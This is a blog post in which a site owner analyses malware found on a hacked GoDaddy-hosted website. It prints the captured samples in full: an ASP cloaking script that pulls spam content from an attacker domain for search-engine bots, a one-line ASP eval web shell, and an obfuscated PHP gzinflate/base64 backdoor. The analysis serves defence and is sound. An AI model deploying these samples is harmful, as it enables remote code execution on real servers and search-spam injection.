GoDaddy weirdeness / hack?

Saw this in my logs around the time the static content on a website got hacked:

2014-11-24 07:31:33 GET /ts_index.html – 80 184.168.27.80 “aQ0O010O” – 200 6619 123 31 “D:\Hosting\6540401\html\ts_index.html”

The user agent of “aQ0O010O” is a bit weird and the IP involved is a GoDaddy IP!

Anyway, the original hack seems to be some sort of content injection on an ASP page that somehow uploaded files into a /script/ folder (I’m yet to work out how).

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%Session.CodePage="65001"%>
<%Response.CodePage="65001"%>

<%
Server.ScriptTimeout=6000

function GetBot()
	dim s_agent 
	GetBot="" 
	s_agent=Request.ServerVariables("HTTP_USER_AGENT") 
	if instr(1,s_agent,"googlebot",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"msnbot",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"slurp",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"baiduspider",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"sohu-search",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"lycos",1) >0 then 
		GetBot="isBot" 
	end if 
	if instr(1,s_agent,"robozilla",1) >0 then 
		GetBot="isBot" 
	end if 
end function 
Public Function GetHtml(url)
	GetHtml = "null"
	Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
	ObjXMLHTTP.Open "GET",url,False
	ObjXMLHTTP.setRequestHeader "User-Agent","aQ0O010O"
	ObjXMLHTTP.send
	GetHtml=ObjXMLHTTP.responseBody
	Set ObjXMLHTTP=Nothing
	set objStream = Server.CreateObject("Adodb.Stream")
	objStream.Type = 1
	objStream.Mode =3
	objStream.Open
	objStream.Write GetHtml
	objStream.Position = 0
	objStream.Type = 2
	objStream.Charset = "utf-8"
	GetHtml = objStream.ReadText
	objStream.Close
End Function

Function GetLocationURL() 
Dim Url 
Dim ServerPort,ServerName,ScriptName,QueryString 
ServerName = Request.ServerVariables("SERVER_NAME") 
ServerPort = Request.ServerVariables("SERVER_PORT") 
ScriptName = Request.ServerVariables("SCRIPT_NAME") 
QueryString = Request.ServerVariables("QUERY_STRING") 
Url="http://"&ServerName 
If ServerPort <> "80" Then Url = Url & ":" & ServerPort 
Url=Url&ScriptName 
If QueryString <>"" Then Url=Url&"?"& QueryString 
GetLocationURL=Url 
End Function 

if GetBot() = "isBot" then
    this_contents = LCase(GetHtml("http://get12.chicstyless.com/domain_get_url_test.php?action=out_put&script_name="&Request.ServerVariables("SCRIPT_NAME")&"&dstring="&Request.ServerVariables("SERVER_NAME")&"&type=asp&do_id="&Request.ServerVariables("QUERY_STRING"))) 
	response.Write(this_contents)
	Response.end()
else
    if instr(Request.ServerVariables("QUERY_STRING"),"-t-") > 0 or instr(Request.ServerVariables("QUERY_STRING"),"-b-") > 0 then
		GetHtml("http://get12.chicstyless.com/51la.php?type=asp&ip="&Request.ServerVariables("REMOTE_ADDR")&"&shell="&Request.ServerVariables("SERVER_NAME"))
		url = "http://get12.chicstyless.com/domain_redirect.php?type=redirect&dstring="&Request.ServerVariables("SERVER_NAME")&"&do_id="&Request.ServerVariables("QUERY_STRING")
		response.redirect url
    else
		oldContent = GetHtml("http://"&Request.ServerVariables("SERVER_NAME")&"/ts_index.html")
		
		response.Write(oldContent)
		
    	Response.end()
    end if
end if
%>

Which seems – if a search engine visits – to just relay the content on your own website while injecting some other crap at the bottom with spam urls to your own domain with -b- and -t- in them:

http://get12.chicstyless.com/domain_get_url_test.php?action=out_put&script_name=/&dstring=ipchicken.com&type=asp&do_id=

Some kind of search engine scamming crap.

It seems the original infection was probably done using the following file – PReywT3cNX.asp

<%response.write(now):eval(request(Chr(88)&Chr(88)&Chr(82)&Chr(107)&Chr(121)&Chr(74)&Chr(80)&Chr(119)&Chr(78)&Chr(119)))%>

Which seems to run anything put into the request.querystring or request.form name of XXRkyJPwNw

Another file of config.php was also present but probably unused as the machine was a windows server:

<?php
eval(“\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28’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’\x29\x29\x29\x3B”);
?>

s

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s